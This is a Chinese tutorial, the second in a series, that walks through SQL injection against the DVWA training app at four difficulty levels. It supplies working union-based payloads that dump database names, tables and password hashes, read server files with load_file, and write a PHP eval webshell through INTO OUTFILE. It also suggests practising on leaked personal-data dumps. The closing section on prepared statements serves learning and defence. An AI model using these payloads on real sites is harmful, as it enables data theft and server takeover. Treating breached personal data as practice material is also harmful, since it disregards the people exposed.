sql注入搞事情（连载二）

sql注入（连载二）安信华web弱点测试系统注入

好多人问我sql怎么学习，我一下也说不出来。我就在此做统一的解答：
sql语句分为两种，不管怎么用还是怎么学习主要是要理解SQL语句的基本概念，框架，原理和解决问题的思路。具体要学的的数据库是一门比较系统的学问感兴趣的可以专门去研究它。所以这也又说明了Web安全是要有一定的开发基础的，一个好的web安全工程师实际上也是一个全栈工程师。

至于我自己就是自己搭建一个库，慢慢训练着玩。而且现在网上爆出的社工库那么多自己随变练练足够用了。

一.sql注入（low）

一样的思路先尝试是否有注入点既然是简单模式那就直接输入

1'

结果回显

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

注意

''1'''

可判断是mysql注入而且有字符型注入点，接下来尝试注入
尝试遍历

1'or'1'='1

图片1

分析一下原因

"SELECT first_name, last_name FROM users WHERE user_id = '1'or'1'='1' "

字符型构造的字符1永远相等，结果返回所有的firstname和lastname

2.猜信息列数（order by）

1'order by 1 -- 

注意--后面有空格
返回正常

图片2

当输入

1'order by 3 -- 

报错没有该列，
所以猜得有两个列

3.猜数据库账户信息、数据库名称、数据库版本信息（利用database，user，version函数）

1' and 1=2 union select 1,2 -- 

返回

ID: 1' and 1=2 union select 1,2 -- 
First name: 1
Surname: 2

从而得出First name处显示结果为查询结果第一列的值，surname处显示结果为查询结果第二列的值，

4.利用内置函数user(),及database()，version()注入得出连接数据库用户以及数据库名称：

1' and 1=2 union select user(),database()  -- 

返回

ID: 1' and 1=2 union select user(),database()  -- 
First name: root@localhost
Surname: dvwa

5.得到数据库用户和数据库名称

1'and 1=2 union select 1,@@global.version_compile_os from mysql.user -- 

6.获得操作系统名称

ID: 1'and 1=2 union select 1,@@global.version_compile_os from mysql.user -- 
First name: 1
Surname: Win32

7.测试连接数据库权限

1' and ord(mid(user(),1,1))=114 --

知道是admin权限

ID: 1' and ord(mid(user(),1,1))=114 --  
First name: admin
Surname: admin

8.查询所有数据库名称

1' and 1=2 union select 1,schema_name from information_schema.schemata -- 

9.数据库所有表

1' UNION SELECT 1,concat(table_name) from information_schema.tables where table_schema=database()-- 

10.猜表名

1' and exists(select * from users) --

表名为为admin

11.猜字段名

 1' and exists(select first_name from users) -- 

字段名也为admin

12.爆用户

 1' and 1=2 union select first_name,last_name from users -- 

13.爆用户名密码

1' UNION SELECT 1,concat(user,0x3a,password) from users-- 

得到md5值的密码，到pmd5解密一下就可以得到了

为什么要使用联合查询？

Union查询结合了两个select查询结果，根据上文中的order by语句我们知道查询包含两列，为了能够现实两列查询结果，我们需要用union查询了结合我们构造的另外一个select.注意在使用union查询的时候需要和主查询的列数相同。

利用注入点读/etc/passwd文件

使用联合查询语句构造，利用注入读取c:\1.txt (Windows系统)

‘ UNION SELECT 1, load_file(‘c:\\1.txt’) +- -+        或者


‘ union select 1, load_file(‘c:\/1.txt’) +- -+

利用注入写入webshell

假设我们通过phpinfo文件知道了网站的物理路径，接下来我们通过使用union select语句来写入webshell.写入需要你有写入权限等。

‘ union select 1,’<?php eval($_POST[cmd]);?>‘ INTO OUTFILE ‘/var/www/dvwa/cmd.php’ +- -+

‘ union select 1,'<?php eval($_POST[cmd]);?>’ into outfile ‘c:\\2.php’+- -+

二.sql注入（medium）数字型

为了节约时间看看源码

<?php

if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];
$id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

// Check database
$query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . mysqli_connect_error() . '</pre>' );

// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
    // Display values
    $first = $row["first_name"];
    $last  = $row["last_name"];

    // Feedback for end user
    echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}

}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?> 

分析：以发现，这里对用户输入的id参数进行了过滤，主要方法是使用了mysql_real_escape_string()函数，这个函数可以将$id变量中的单引号’、双引号”、斜杠\等字符进行转义，因而我们再输入之前的“’or 1=1 #”就会报错了，从错误提示中可以发现单引号’已经被转义成了\’，因而注入语句无法发挥作用。

需要说明的是，在PHP中还有一个与mysql_real_escape_string()功能类似的函数：addslashes（），这两个函数的功能都是对特殊字符进行转义，那么到底用哪个函数更好一些呢？百度了一下，发现大家也是各执一词。有人说mysql_real_escape_string()函数需要事先连接数据库，可能会报错，所以推荐使用addslashes()；也有的人说addslashes()过滤不够严格，推荐使用mysql_real_escape_string()。在DVWA中很明显是推荐使用mysql_real_escape_string()，那么我们就相信DVWA好了。

下面我们分析一下这里该如何绕过过滤，继续进行注入呢？我们再仔细观察一下源码，可以发现参数id已经被改为了数字型，第三行语句中“user_id = $id”，而之前的low级别是“user_id = ‘$id’”，其实这就是DVWA故意留下的一个漏洞。

值得一提的是虽然前端使用了下拉选择菜单，但我们依然可以通过抓包改参数，提交恶意构造的查询参数。

1.判断是否存在注入，注入是字符型还是数字型

抓包更改参数id为

1′ or 1=1 #

2.猜解SQL查询语句中的字段数

1 order by 2 #
1 order by 3 #

3.确定显示的字段顺序

1 union select 1,2 #

4.获取当前数据库

1 union select 1,database() #

5.获取数据库中的表

1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

6.获取表中的字段名

1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0×7573657273 #

7.下载数据

1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #

其实在分析完成后和low是一个道理，所以关键在于怎么绕过

三.sql注入high级别

一样代码审计：

<?php 

if( isset( $_SESSION [ 'id' ] ) ) { 
// Get input 
$id = $_SESSION[ 'id' ]; 

// Check database 
$query  = "SELECT first_name, last_name FROM users WHERE user_id = $id LIMIT 1;"; 
$result = mysql_query( $query ) or die( '<pre>Something went wrong.</pre>' ); 

// Get results 
$num = mysql_numrows( $result ); 
$i   = 0; 
while( $i < $num ) { 
    // Get values 
    $first = mysql_result( $result, $i, "first_name" ); 
    $last  = mysql_result( $result, $i, "last_name" ); 

    // Feedback for end user 
    echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 

    // Increase loop count 
    $i++; 
} 

mysql_close(); 
} 

?> 

分析：与Medium级别的代码相比，High级别的只是在SQL查询语句中添加了LIMIT 1，希望以此控制只输出一个结果。然而并没有什么卵用。虽然添加了LIMIT 1，但是我们可以通过#将其注释掉。由于手工注入的过程与Low级别基本一样。

最后

1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #

值得一提的是：High级别的查询提交页面与查询结果显示页面不是同一个，也没有执行302跳转，这样做的目的是为了防止一般的sqlmap注入，因为sqlmap在注入过程中，无法在查询提交页面上获取查询的结果，没有了反馈，也就没办法进一步注入。

3.SQL注入impossible级

代码审计

<?php 

if( isset( $_GET[ 'Submit' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

// Get input 
$id = $_GET[ 'id' ]; 

// Was a number entered? 
if(is_numeric( $id )) { 
    // Check the database 
    $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' ); 
    $data->bindParam( ':id', $id, PDO::PARAM_INT ); 
    $data->execute(); 
    $row = $data->fetch(); 

    // Make sure only 1 result is returned 
    if( $data->rowCount() == 1 ) { 
        // Get values 
        $first = $row[ 'first_name' ]; 
        $last  = $row[ 'last_name' ]; 

        // Feedback for end user 
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 
    } 
} 
} 

// Generate Anti-CSRF token 
generateSessionToken(); 

?> 

可以看到，Impossible级别的代码采用了PDO技术，划清了代码与数据的界限，有效防御SQL注入，同时只有返回的查询结果数量为一时，才会成功输出，这样就有效预防了“脱裤”，Anti-CSRFtoken机制的加入了进一步提高了安全性。